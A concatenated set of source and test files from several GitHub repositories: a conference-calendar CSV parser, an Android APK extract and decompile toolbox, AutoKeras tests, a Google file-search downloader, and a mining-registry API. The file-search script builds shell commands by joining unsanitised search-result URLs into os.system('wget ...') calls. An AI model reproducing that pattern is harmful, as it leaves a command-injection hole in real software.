def __init__(self, csv_file):
self.csv_file = csv_file
def parse_events(self) -> Set[Event]:
"""
Parse a CSV file and return a list of events
"""
results = set()
csv_reader = DictReader(self.csv_file)
if csv_reader.fieldnames != HEADER_NAMES:
raise MalformedCSV(f'Expected header to equal {HEADER_NAMES} but got {csv_reader.fieldnames}')
for row in csv_reader:
try:
start_date = date.fromisoformat(row['start_date'])
end_date = date.fromisoformat(row['end_date'])
website = row['website']
description = row['description']
title = row['title']
except (KeyError, ValueError) as exc:
raise MalformedCSV from exc
event = Event(
start_date=start_date,
end_date=end_date,
website=website,
description=description,
title=title
)
results.add(event)
return results
```
#### File: jezhiggins/conference-calendar/test_csv_calendar.py
```python
from datetime import date
from pathlib import Path
from csv_calendar import parse_events, MalformedCSV
from models import Event
import pytest
def test_parsing_valid_events():
with open(Path('test_data', '2020.csv')) as csv_file:
events = parse_events(csv_file)
expected_events = set((
Event(
title='expected1',
start_date=date(2020, 3, 1),
end_date=date(2020, 3, 2),
website='https://www.google.com',
description='test conference'
),
Event(
title='expected2',
start_date=date(2020, 3, 2),
end_date=date(2020, 3, 4),
website='https://www.google.com',
description='another test conference'
),
))
assert events == expected_events
def test_parsing_valid_events():
with open(Path('test_data', 'empty.csv')) as csv_file:
events = parse_events(csv_file)
assert events == set()
@pytest.mark.parametrize("filename", ['invalid_date.csv', 'missing_header.csv'])
def test_malformed_csv(filename):
with open(Path('test_data', filename)) as csv_file:
with pytest.raises(MalformedCSV):
parse_events(csv_file)
```
#### File: jezhiggins/conference-calendar/test_sync.py
```python
from sync import (
plan_changes,
Event, Plan,
Syncer
)
from datetime import date
from unittest.mock import Mock
def test_edit_event():
original_event = Event(
title='original',
start_date=date(2020, 3, 2),
end_date=date(2020, 3, 4),
website='https://www.google.com',
description='another test conference'
)
changed_event = Event(
title='changed',
start_date=date(2020, 3, 2),
end_date=date(2020, 3, 4),
website='https://www.google.com',
description='updated description'
)
unchanged_event = Event(
title='unchanged',
start_date=date(2020, 3, 1),
end_date=date(2020, 3, 2),
website='https://www.google.com',
description='test conference'
)
existing_events = {
unchanged_event: 1,
original_event: 2,
}
desired_events = set((
unchanged_event,
changed_event
))
plan = plan_changes(
existing_events=existing_events,
desired_events=desired_events
)
assert plan.to_add == set((changed_event,))
assert plan.to_remove == set((2,))
def test_nothing_to_change():
event1 = Event(
title='event1',
start_date=date(2020, 3, 1),
end_date=date(2020, 3, 2),
website='https://www.google.com',
description='test conference'
)
event2 = Event(
title='event2',
start_date=date(2020, 3, 2),
end_date=date(2020, 3, 4),
website='https://www.google.com',
description='another test conference'
)
events = set((
event1,
))
plan = plan_changes(
existing_events={
event1: 1,
event2: 2
},
desired_events=set((event1, event2))
)
assert plan.to_add == set()
assert plan.to_remove == set()
def test_syncer_obeys_the_plan():
changed_event = Event(
title='changed',
start_date=date(2020, 3, 2),
end_date=date(2020, 3, 4),
website='https://www.google.com',
description='updated description'
)
removed_event_id = 123
plan = Plan(
to_add=set((changed_event,)),
to_remove=set((removed_event_id,))
)
calendar_api = Mock()
csv_parser = Mock()
planner = Mock()
calendar_api.add = Mock()
calendar_api.remove = Mock()
planner.plan = Mock(return_value=plan)
syncer = Syncer(calendar_api, csv_parser, planner)
syncer.sync()
calendar_api.add.assert_called_once_with(changed_event)
calendar_api.remove.assert_called_once_with(removed_event_id)
```
|
{
"source": "jeziellago/android-sec-box",
"score": 3
}
|
#### File: secbox/apkextract/check_adb.py
```python
import os
import subprocess
import urllib3
import shutil
import sys
from zipfile import ZipFile
PLATFORM_TOOLS_LINUX_URL= "https://dl.google.com/android/repository/platform-tools_r29.0.6-linux.zip"
PLATFORM_TOOLS_MAC_URL = "https://dl.google.com/android/repository/platform-tools-latest-darwin.zip"
def get_platformtools_url_from_system():
if sys.platform.startswith('linux'):
return PLATFORM_TOOLS_LINUX_URL
else:
return PLATFORM_TOOLS_MAC_URL
def has_adb_installed(command):
try:
proc = subprocess.Popen([command, "--version"],stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
proc.wait()
return True
except:
return False
def download_platform_tools():
print('[*] Downloading platform-tools ...')
pm = urllib3.PoolManager()
request = pm.request('GET', get_platformtools_url_from_system(), preload_content=False)
filename = "platform-tools.zip"
with request, open(filename, 'wb') as out_file:
shutil.copyfileobj(request, out_file)
print('[-] Download platform-tools finished')
with ZipFile(filename, 'r') as zipObj:
print('[-] Extracting ' + filename)
zipObj.extractall()
print('[-] File "%s" extracted.' % filename)
os.system('chmod +x platform-tools/adb')
if has_adb_installed('platform-tools/adb'):
print("[>>] Android Debug Bridge (ADB) installed!")
def check_adb():
print("[!] Checking installation of Android Debug Bridge (ADB) ...")
adb = 'adb'
platform_tools_adb = 'platform-tools/adb'
if has_adb_installed(adb):
print("[>>] Android Debug Bridge (ADB) from environment [OK]")
return adb
elif has_adb_installed(platform_tools_adb):
print("[>>] Android Debug Bridge (ADB) from %s [OK]" % platform_tools_adb)
return platform_tools_adb
else:
print("[x] Android Debug Bridge (ADB) Not Found!")
download_platform_tools()
return platform_tools_adb
```
#### File: secbox/app/secbox.py
```python
import os
from time import sleep
from .actionbox import extract_apk, decompile_only_sources, decompile_only_resources, decompile_all, recompile_apk
class SecBox:
def __init__(self):
self.__create_states__()
self.menu_options = []
self.__add_menu_option__('Extract apk from device', extract_apk)
self.__add_menu_option__('Decompile only sources from apk', decompile_only_sources)
self.__add_menu_option__('Decompile only resources from apk', decompile_only_resources)
self.__add_menu_option__('Decompile all from apk', decompile_all)
self.__add_menu_option__('Recompile modified apk from folder', recompile_apk)
def start(self):
try:
self.current_state = self.STATE_IDLE
while True:
self.__draw_header__()
self.__handle_state__()
except KeyboardInterrupt:
print('\n<!> Exiting... Bye :)')
exit()
def __handle_state__(self):
if self.current_state == self.STATE_IDLE:
self.__draw_menu__()
option = input('\n\n::> ')
self.__select_menu_option__(option)
else: pass
def __select_menu_option__(self, option):
action = None
for menu in self.menu_options:
if option == str(menu["id"]):
action = menu["action"]
break
if action:
self.current_state = self.STATE_PROCESSING
action()
self.current_state = self.STATE_IDLE
input('\n[!] Press any key to [MENU]::>')
def __create_states__(self):
self.STATE_IDLE = 0
self.STATE_PROCESSING = 1
def __add_menu_option__(self, option, action):
next_option_id = len(self.menu_options) + 1
self.menu_options.append({
"id": next_option_id,
"description": option,
"action": action
})
def __draw_header__(self):
os.system('clear')
print(
""" Welcome to
_________ ___.
/ _____/ ____ ____\_ |__ _______ ___
\_____ \_/ __ \_/ ___\| __ \ / _ \ \/ /
/ \ ___/\ \___| \_\ ( <_> > <
/_______ /\___ >\___ >___ /\____/__/\_ \\
\/ \/ \/ \/ \/
powered by @jeziellago
""")
def __draw_menu__(self):
print('\t[ MENU ]')
for menu in self.menu_options:
print('\t[ %s ] %s' % (menu["id"], menu["description"]))
```
|
{
"source": "jeziellago/autokeras",
"score": 2
}
|
#### File: tests/nn/test_generator.py
```python
from autokeras.nn.generator import *
from autokeras.nn.graph import TorchModel
def test_default_generator():
generator = CnnGenerator(3, (28, 28, 1))
graph = generator.generate()
model = graph.produce_model()
assert isinstance(model, TorchModel)
```
#### File: tests/text/test_text_supervised.py
```python
from unittest.mock import patch
import pytest
from autokeras.text.text_supervised import *
from tests.common import clean_dir, MockProcess, simple_transform
def mock_train(**kwargs):
str(kwargs)
return 1, 0
def mock_text_preprocess(x_train, path="dummy_path"):
return x_train
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
@patch('autokeras.search.ModelTrainer.train_model', side_effect=mock_train)
def test_fit_predict(_, _1):
Constant.MAX_ITER_NUM = 1
Constant.MAX_MODEL_NUM = 4
Constant.SEARCH_MAX_ITER = 1
Constant.T_MIN = 0.8
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=True)
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
clf.fit(train_x, train_y, )
results = clf.predict(train_x)
assert all(map(lambda result: result in train_y, results))
clean_dir(path)
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
def test_timeout(_):
# Constant.MAX_MODEL_NUM = 4
Constant.SEARCH_MAX_ITER = 1000
Constant.T_MIN = 0.0001
Constant.DATA_AUGMENTATION = False
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=False)
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
with pytest.raises(TimeoutError):
clf.fit(train_x, train_y, time_limit=0)
clean_dir(path)
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
@patch('autokeras.search.ModelTrainer.train_model', side_effect=mock_train)
def test_timeout_resume(_, _1):
Constant.MAX_ITER_NUM = 1
# make it impossible to complete within 10sec
Constant.MAX_MODEL_NUM = 1000
Constant.SEARCH_MAX_ITER = 1
Constant.T_MIN = 0.8
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
test_x = np.random.rand(100, 25, 25, 1)
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=False, resume=False)
clf.n_epochs = 100
clf.fit(train_x, train_y, time_limit=2)
history_len = len(clf.load_searcher().history)
assert history_len != 0
results = clf.predict(test_x)
assert len(results) == 100
clf = TextClassifier(path=path, verbose=False, resume=True)
assert len(clf.load_searcher().history) == history_len
Constant.MAX_MODEL_NUM = history_len + 1
clf.fit(train_x, train_y)
assert len(clf.load_searcher().history) == history_len + 1
results = clf.predict(test_x)
assert len(results) == 100
clean_dir(path)
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.bayesian.transform', side_effect=simple_transform)
@patch('autokeras.search.ModelTrainer.train_model', side_effect=mock_train)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
def test_final_fit(_, _1, _2):
Constant.LIMIT_MEMORY = True
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=False)
Constant.MAX_ITER_NUM = 1
Constant.MAX_MODEL_NUM = 1
Constant.SEARCH_MAX_ITER = 1
Constant.N_NEIGHBOURS = 1
Constant.T_MIN = 0.8
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
test_x = np.random.rand(100, 25, 25, 1)
test_y = np.random.randint(0, 5, 100)
clf.fit(train_x, train_y)
clf.final_fit(train_x, train_y, test_x, test_y)
results = clf.predict(test_x)
assert len(results) == 100
clean_dir(path)
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.search.ModelTrainer.train_model', side_effect=mock_train)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
def test_save_continue(_, _1):
Constant.MAX_ITER_NUM = 1
Constant.MAX_MODEL_NUM = 1
Constant.SEARCH_MAX_ITER = 1
Constant.T_MIN = 0.8
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
test_x = np.random.rand(100, 25, 25, 1)
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=False, resume=False)
clf.n_epochs = 100
clf.fit(train_x, train_y, time_limit=5)
assert len(clf.load_searcher().history) == 1
Constant.MAX_MODEL_NUM = 2
clf = TextClassifier(verbose=False, path=path, resume=True)
clf.fit(train_x, train_y)
results = clf.predict(test_x)
assert len(results) == 100
assert len(clf.load_searcher().history) == 2
Constant.MAX_MODEL_NUM = 1
clf = TextClassifier(verbose=False, path=path, resume=False)
clf.fit(train_x, train_y)
results = clf.predict(test_x)
assert len(results) == 100
assert len(clf.load_searcher().history) == 1
clean_dir(path)
@patch('autokeras.text.text_supervised.temp_folder_generator', return_value='dummy_path/')
def test_init_image_classifier_with_none_path(_):
clf = TextClassifier()
assert clf.path == 'dummy_path/'
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.search.ModelTrainer.train_model', side_effect=mock_train)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
def test_evaluate(_, _1):
Constant.MAX_ITER_NUM = 1
Constant.MAX_MODEL_NUM = 1
Constant.SEARCH_MAX_ITER = 1
Constant.T_MIN = 0.8
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=False, resume=False)
clf.n_epochs = 100
clf.fit(train_x, train_y)
score = clf.evaluate(train_x, train_y)
assert score <= 1.0
```
|
{
"source": "jeziellago/GoogleFilesFinder",
"score": 3
}
|
#### File: jeziellago/GoogleFilesFinder/Google_Files_Finder.py
```python
import os
import googlesearch
""" --------------------------------------------------------------------------- """
def cut_string(text, limit):
i = 0
while i > -1:
s = str(text[i:(i+1)])
i = i + 1
if s == limit:
text = text[0:i-1]
i = -1
if i > len(text):
i = -1
return text
""" --------------------------------------------------------------------------- """
def listFilesFromResult(all_files, log):
print('\nListing files URLs:\n')
position = 1
for url in all_files:
url = cut_string(url,'&')
if url[1:4] == 'url':
url = url[7:len(url)]
print('-------> ['+str(position)+"] " + url)
log.append(url)
position += 1
print('\n')
return log
""" --------------------------------------------------------------------------- """
def saveResultsInFile(log_list):
save_results = input("\n\n>> Do you want to save the results to a file? [Y/n] ")
if save_results == '' or save_results == 'Y' or save_results == 'y':
path_file = input("\n>> Enter the filename to save: ")
if path_file != '':
f = open(path_file,'w')
n = 0
for log in log_list:
f.write("\n" + "[" + str(n) + "] "+ log)
n = n + 1
f.close()
print("\nFile " + path_file + " saved!\n\n")
""" --------------------------------------------------------------------------- """
def downloadFiles(log_list):
do_wget = input("\n>> Do you want download (with wget) all files? [Y/n] ")
if do_wget == '' or do_wget == 'Y' or do_wget == 'y':
dir_save = input("\n>> Enter dir for save the files: ")
if dir_save != "":
for log in log_list:
os.system("wget " + log + " -P " + dir_save)
else:
do_wget = input("\n>> Do you want download (with wget) any file? [Y/n] ")
if do_wget == '' or do_wget == 'Y' or do_wget == 'y':
url_position = input("\n>> Enter the url position for download or 0 for exit (Ex.: 1,2,3...): ")
while(int(url_position) > 0):
dir_save = input("\n>> Enter dir for save the file: ")
if dir_save != "":
os.system("wget " + log_list[int(url_position)] + " -P " + dir_save)
url_position = input("\n>> Enter the url position for download or 0 for exit (Ex.: 1,2,3...): ")
""" --------------------------------------------------------------------------- """
def printHeader():
os.system("clear")
print('================================================================')
print('/ /')
print('/ GOOGLE FILE FINDER /')
print('/ by <NAME> /')
print('================================================================')
""" --------------------------------------------------------------------------- """
def main():
try:
printHeader()
# Input user search
search = input("\n-> Enter a key word: ")
log = []
log.append("Key Word of File Search -> " + search + "\n\n")
search = search.replace(" ","+")
file_type = input("-> Enter the file type (Ex.: pdf, txt, docx): ")
amount_results = int(input("-> Enter the max amount of results (Max = 1000000): "))
# Start Search
print('\n\n[-] Searching files in google...')
search = googlesearch.search_google(search, amount_results, 1, file_type)
search.process()
all_files = search.get_files()
# Listing files from results
log = listFilesFromResult(all_files, log)
# Save Results
saveResultsInFile(log)
# Download files
downloadFiles(log)
print("\n\nFinish!\n")
except KeyboardInterrupt:
print('\n Files Finder closed..Thanks for use')
""" --------------------------------------------------------------------------- """
if __name__ == "__main__":
main()
```
|
{
"source": "jeziellago/list-android-large-files",
"score": 3
}
|
#### File: jeziellago/list-android-large-files/list_large_files.py
```python
import os
import sys
from argparse import ArgumentParser
files_count={}
def walk(ROOT):
if os.path.isfile(ROOT):
if "build" not in ROOT and (ROOT.endswith(".java") or ROOT.endswith(".kt")):
count = 1
for _ in open(ROOT, "r"):
count += 1
files_count[ROOT.split("/")[-1]] = count
else:
dirs = os.listdir(ROOT)
for d in dirs:
path = os.path.join(ROOT, d)
walk(path)
def print_results(limit, output_file, include_test):
sorted_files = sorted(files_count.items(), key=lambda x: x[1], reverse=True)
check_test_file = lambda filename: not "Test" in filename if not include_test else True
def print_line(position, count, filename, output_file=None):
if output_file: output_file.write("{},{},{}\n".format(position,count,filename))
else: print("[{}º]> {} lines - {}".format(position,count,filename))
csv_file = None
if output_file:
csv_file = open(output_file + ".csv", "w")
csv_file.write("Position,Lines,File\n")
index = 1
for fl in sorted_files:
if fl[1] >= limit and check_test_file(fl[0]):
print_line(index, fl[1],fl[0], csv_file)
index += 1
def main(args):
project = args.project
limit = args.limit
include_test = args.include_test
output_file = args.output
walk(project)
print_results(limit, output_file, include_test)
if __name__ == '__main__':
parser = ArgumentParser(description="Show the largest files in Android project")
parser.add_argument('--project', help='Project dir')
parser.add_argument('--limit', help='Lines count limit', default=300)
parser.add_argument('--include_test', help='Include test files')
parser.add_argument('--output', help='File to save the results')
args = parser.parse_args()
main(args)
```
|
{
"source": "jezifm/cognalys-api-python-client",
"score": 3
}
|
#### File: jezifm/cognalys-api-python-client/test_cognalys.py
```python
import string
import random
import unittest
import mock
import requests
import cognalys
def random_string(size=12, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def random_mobile():
random_digit = random.randint(0, 9999999)
return '+63921{random_digit:07d}'.format(random_digit=random_digit)
def url_from_requests_args(*args, **kwargs):
url_components = list(requests.compat.urlparse(args[0]))
url_components[4] = requests.compat.urlencode(kwargs['params'])
url = requests.compat.urlunparse(url_components)
return url
class MockTest(unittest.TestCase):
def setUp(self):
self.access_token = random_string()
self.app_id = random_string()
self.client = cognalys.OTPClient(self.access_token, self.app_id)
@mock.patch('cognalys.requests')
def test_can_send_missed_call(self, mrequests):
mobile = random_mobile()
response_missed_call = self.client.send_missed_call(mobile)
# get url
args, kwargs = mrequests.get.call_args
url = args[0]
self.assertIn(self.access_token, url)
self.assertIn(self.app_id, url)
self.assertIn(mobile, url)
@mock.patch('cognalys.requests')
def test_can_verify_number(self, mrequests):
keymatch = random_string()
otp_number = random_string()
response_verification = self.client.verify_number(keymatch, otp_number)
# get url
args, kwargs = mrequests.get.call_args
url = url_from_requests_args(*args, **kwargs)
self.assertIn(self.access_token, url)
self.assertIn(self.app_id, url)
self.assertIn(keymatch, url)
self.assertIn(otp_number, url)
```
|
{
"source": "jezlo/listWithWLST",
"score": 3
}
|
#### File: listWithWLST/Pruebas/testConex.py
```python
import java.io.FileReader;
import javax.json.Json;
import javax.json.JsonReader;
import javax.json.JsonStructure;
#import json
def getDatosConex():
with open('config.json') as json_files:
data = json.load(json_files)
for p in data['conexion']:
print('Usuario: '+p['usuario'])
print('Password: '+p['password'])
print('URL: '+p['url'])
getDatosConex()
```
|
{
"source": "jeznorth/mds",
"score": 2
}
|
#### File: expected/resources/expected_document_uploads.py
```python
import decimal
import uuid
import requests
import json
from datetime import datetime
from flask import request, current_app
from flask_restplus import Resource, reqparse
from werkzeug.datastructures import FileStorage
from werkzeug import exceptions
from sqlalchemy.exc import DBAPIError
from ..models.mine_expected_document import MineExpectedDocument
from ....mines.mine.models.mine import Mine
from ...expected.models.mine_expected_document import MineExpectedDocument
from ...expected.models.mine_expected_document_xref import MineExpectedDocumentXref
from ...mines.models.mine_document import MineDocument
from app.extensions import api, db
from ....utils.access_decorators import requires_any_of, MINE_CREATE, MINESPACE_PROPONENT
from ....utils.resources_mixins import UserMixin, ErrorMixin
class ExpectedDocumentUploadResource(Resource, UserMixin, ErrorMixin):
parser = reqparse.RequestParser()
@api.expect(parser)
@api.doc(
params={
'expected_document_guid':
'Required: The guid of the expected document that this upload will be satisfying.'
})
@requires_any_of([MINE_CREATE, MINESPACE_PROPONENT])
def post(self, expected_document_guid):
self.parser.add_argument('file', type=FileStorage, location='files', action='append')
self.parser.add_argument('mine_document_guid', type=str)
try:
data = self.parser.parse_args()
except exceptions.RequestEntityTooLarge:
return self.create_error_payload(
413,
f'The maximum file upload size is {current_app.config["MAX_CONTENT_LENGTH"]/1024/1024}MB please ensure all files are this size.'
), 413
expected_document = MineExpectedDocument.find_by_exp_document_guid(expected_document_guid)
if not expected_document:
return self.create_error_payload(400, f'expected document not found'), 400
mine = Mine.find_by_mine_guid(str(expected_document.mine_guid))
document_category = expected_document.required_document.req_document_category.req_document_category
if data.get('mine_document_guid'):
existing_mine_doc = MineDocument.find_by_mine_document_guid(
data.get('mine_document_guid'))
if not existing_mine_doc:
return self.create_error_payload(400, 'mine_document not found'), 400
expected_document.mine_documents.append(existing_mine_doc)
db.session.commit()
result = expected_document.json()
else: #expecting a new file
if not data['file']:
return self.create_error_payload(
400, 'expecting mine_document_guid or new file, neither found'), 400
if document_category:
folder = 'mines/' + str(mine.mine_guid) + '/' + str(document_category)
pretty_folder = 'mines/' + str(mine.mine_no) + '/' + str(document_category)
else:
folder = 'mines/' + str(mine.mine_guid) + '/documents'
pretty_folder = 'mines/' + str(mine.mine_no) + '/documents'
document_manager_URL = current_app.config['DOCUMENT_MANAGER_URL'] + '/document-manager'
files = []
for file in data['file']:
files.append(('file', (file.filename, file, file.mimetype)))
args = {'folder': folder, 'pretty_folder': pretty_folder}
headers = {'Authorization': request.headers.get('Authorization')}
response = requests.post(
url=document_manager_URL, data=args, files=files, headers=headers)
json_response = response.json()
errors = json_response['errors']
document_guids = json_response['document_manager_guids']
filenames = []
try:
for key, value in document_guids.items():
doc = MineDocument(
mine_guid=expected_document.mine_guid,
document_manager_guid=key,
document_name=value,
**self.get_create_update_dict())
expected_document.mine_documents.append(doc)
db.session.add(expected_document)
filenames.append(value)
db.session.commit()
except DBAPIError:
#log the error here and return a pretty error message
db.session.rollback()
return self.create_error_payload(500, 'An unexpected error occured')
result = {'status': 200, 'errors': errors, 'files': filenames}
return result
@requires_any_of([MINE_CREATE, MINESPACE_PROPONENT])
def delete(self, expected_document_guid=None, mine_document_guid=None):
if expected_document_guid is None or mine_document_guid is None:
return self.create_error_payload(
400, 'Must provide a expected document guid and a mine document guid.'), 400
expected_document = MineExpectedDocument.find_by_exp_document_guid(expected_document_guid)
mine_document = MineDocument.find_by_mine_document_guid(mine_document_guid)
if expected_document is None or mine_document is None:
return self.create_error_payload(
400,
f'Failed to remove the document either the expected document or the mine document was not found.'
), 400
expected_document.mine_documents.remove(mine_document)
expected_document.save()
return {'status': 200, 'message': 'The document was removed succesfully.'}
```
#### File: required/models/required_document_categories.py
```python
from datetime import datetime
import uuid
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.schema import FetchedValue
from sqlalchemy.orm import validates
from app.extensions import db
from ....utils.models_mixins import AuditMixin, Base
#comment to force commit
class RequiredDocumentCategory(Base):
__tablename__ = 'mds_required_document_category'
req_document_category_guid = db.Column(UUID(as_uuid=True), primary_key=True, server_default=FetchedValue())
req_document_category = db.Column(db.String(60))
def json(self):
return {
'req_document_category_guid': str(self.req_document_category_guid),
'req_document_category': str(self.req_document_category),
}
```
#### File: api/nris_services/NRIS_service.py
```python
import decimal
import uuid
import requests
import json
import functools
from dateutil.relativedelta import relativedelta
from datetime import datetime
from flask import request, current_app
from flask_restplus import Resource, reqparse
from werkzeug.datastructures import FileStorage
from werkzeug import exceptions
from sqlalchemy.exc import DBAPIError
from app.extensions import cache
from ..constants import NRIS_CACHE_PREFIX, TIMEOUT_24_HOURS, TIMEOUT_12_HOURS
def _get_datetime_from_NRIS_data(date):
return datetime.strptime(date, '%Y-%m-%d %H:%M')
def _get_NRIS_token():
result = cache.get(NRIS_CACHE_PREFIX + 'token')
if result is None:
params = {
'disableDeveloperFilter': 'true',
'grant_type': 'client_credentials',
'scope': 'NRISWS.*'
}
url = current_app.config['NRIS_TOKEN_URL']
if url is None:
raise TypeError('Could not load the NRIS URL.')
else:
resp = requests.get(
url=url,
params=params,
auth=(current_app.config['NRIS_USER_NAME'], current_app.config['NRIS_PASS']))
try:
resp.raise_for_status()
except:
raise
result = resp.json().get('access_token')
cache.set(NRIS_CACHE_PREFIX + 'token', result, timeout=TIMEOUT_12_HOURS)
return result
def _get_EMPR_data_from_NRIS(mine_no):
current_date = datetime.now()
try:
token = _get_NRIS_token()
except:
raise
if token is None:
return None
url = current_app.config['NRIS_INSPECTION_URL']
if url is None:
raise TypeError('Could not load the NRIS URL.')
else:
#Inspection start date is set to 2018-01-01 as that is the begining of time for NRIS
params = {
'inspectionStartDate': '2018-01-01',
'inspectionEndDate': f'{current_date.year}-{current_date.month}-{current_date.day}',
'mineNumber': mine_no,
}
headers = {'Authorization': 'Bearer ' + token}
try:
empr_nris_resp = requests.get(
url=current_app.config['NRIS_INSPECTION_URL'], params=params, headers=headers)
except requests.exceptions.Timeout:
raise
try:
empr_nris_resp.raise_for_status()
except requests.exceptions.HTTPError:
#TODO add logging for this error.
raise
return empr_nris_resp.json()
def _process_NRIS_data(data, mine_no):
data = sorted(
data,
key=lambda k: datetime.strptime(k.get('assessmentDate'), '%Y-%m-%d %H:%M'),
reverse=True)
most_recent = data[0]
advisories = 0
warnings = 0
num_open_orders = 0
num_overdue_orders = 0
section_35_orders = 0
open_orders_list = []
for report in data:
report_date = _get_datetime_from_NRIS_data(report.get('assessmentDate'))
one_year_ago = datetime.now() - relativedelta(years=1)
prefix, inspector = report.get('assessor').split('\\')
inspection = report.get('inspection')
stops = inspection.get('stops')
order_count = 1
for stop in stops:
stop_orders = stop.get('stopOrders')
stop_advisories = stop.get('stopAdvisories')
stop_warnings = stop.get('stopWarnings')
for order in stop_orders:
if order.get('orderStatus') == 'Open':
legislation = order.get('orderLegislations')
permit = order.get('orderPermits')
section = None
if legislation:
section = legislation[0].get('section')
elif permit:
section = permit[0].get('permitSectionNumber')
order_to_add = {
'order_no': f'{report.get("assessmentId")}-{order_count}',
'violation': section,
'report_no': report.get('assessmentId'),
'inspector': inspector,
'due_date': order.get('orderCompletionDate'),
'overdue': False,
}
num_open_orders += 1
if order.get(
'orderCompletionDate') is not None and _get_datetime_from_NRIS_data(
order.get('orderCompletionDate')) < datetime.now():
num_overdue_orders += 1
order_to_add['overdue'] = True
open_orders_list.append(order_to_add)
order_count += 1
if order.get('orderAuthoritySection') == 'Section 35':
section_35_orders += 1
if one_year_ago < report_date:
advisories += len(stop_advisories)
warnings += len(stop_warnings)
overview = {
'last_inspection': most_recent.get('assessmentDate'),
'inspector': inspector,
'num_open_orders': num_open_orders,
'num_overdue_orders': num_overdue_orders,
'advisories': advisories,
'warnings': warnings,
'section_35_orders': section_35_orders,
'open_orders': open_orders_list,
}
cache.set(NRIS_CACHE_PREFIX + mine_no, overview, timeout=TIMEOUT_24_HOURS)
return overview
```
#### File: party_appt/resources/test_mpa_permittee_resource.py
```python
from datetime import datetime
import json
from tests.constants import TEST_PERMITTEE_GUID, TEST_MINE_GUID, TEST_PERMIT_GUID_1, TEST_PARTY_PER_GUID_3
NON_EXISTENT_GUID = '8ef23184-02c4-4472-a912-380b5a0d9cae'
# GET
def test_get_permittee_not_found(test_client, auth_headers):
get_resp = test_client.get(
'/parties/mines/' + NON_EXISTENT_GUID, headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 404, str(get_resp.response)
get_data = json.loads(get_resp.data.decode())
assert get_data['error']['message']
def test_get_permittee(test_client, auth_headers):
get_resp = test_client.get(
'/parties/mines/' + TEST_PERMITTEE_GUID, headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, str(get_resp.response)
get_data = json.loads(get_resp.data.decode())
assert get_data['mine_party_appt_guid'] == TEST_PERMITTEE_GUID
assert get_data['mine_party_appt_type_code'] == 'PMT'
# POST
def test_post_permittee_unexpected_id_in_url(test_client, auth_headers):
post_resp = test_client.post('/parties/unexpected_id', headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_post_permittee_no_party(test_client, auth_headers):
data = {
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'permit_guid': TEST_PERMIT_GUID_1,
'mine_party_appt_type_code': 'PMT',
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_post_permittee_no_permit(test_client, auth_headers):
data = {
'party_guid': TEST_PARTY_PER_GUID_3,
'mine_party_appt_type_code': 'PMT',
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
post_data = json.loads(post_resp.data.decode())
assert post_resp.status_code == 400, str(post_resp.response)
assert post_data['error']['message']
def test_post_permittee_no_permittee(test_client, auth_headers):
data = {
'party_guid': TEST_PARTY_PER_GUID_3,
'permit_guid': TEST_PERMIT_GUID_1,
'mine_party_appt_type_code': 'PMT',
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_post_permittee_no_permittee_no_effective_date(test_client, auth_headers):
data = {
'party_guid': TEST_PARTY_PER_GUID_3,
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'mine_party_appt_type_code': 'PMT',
'related_guid': TEST_PERMIT_GUID_1,
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_post_permittee(test_client, auth_headers):
data = {
'mine_guid': TEST_MINE_GUID,
'party_guid': TEST_PARTY_PER_GUID_3,
'mine_party_appt_type_code': 'PMT',
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'related_guid': TEST_PERMIT_GUID_1,
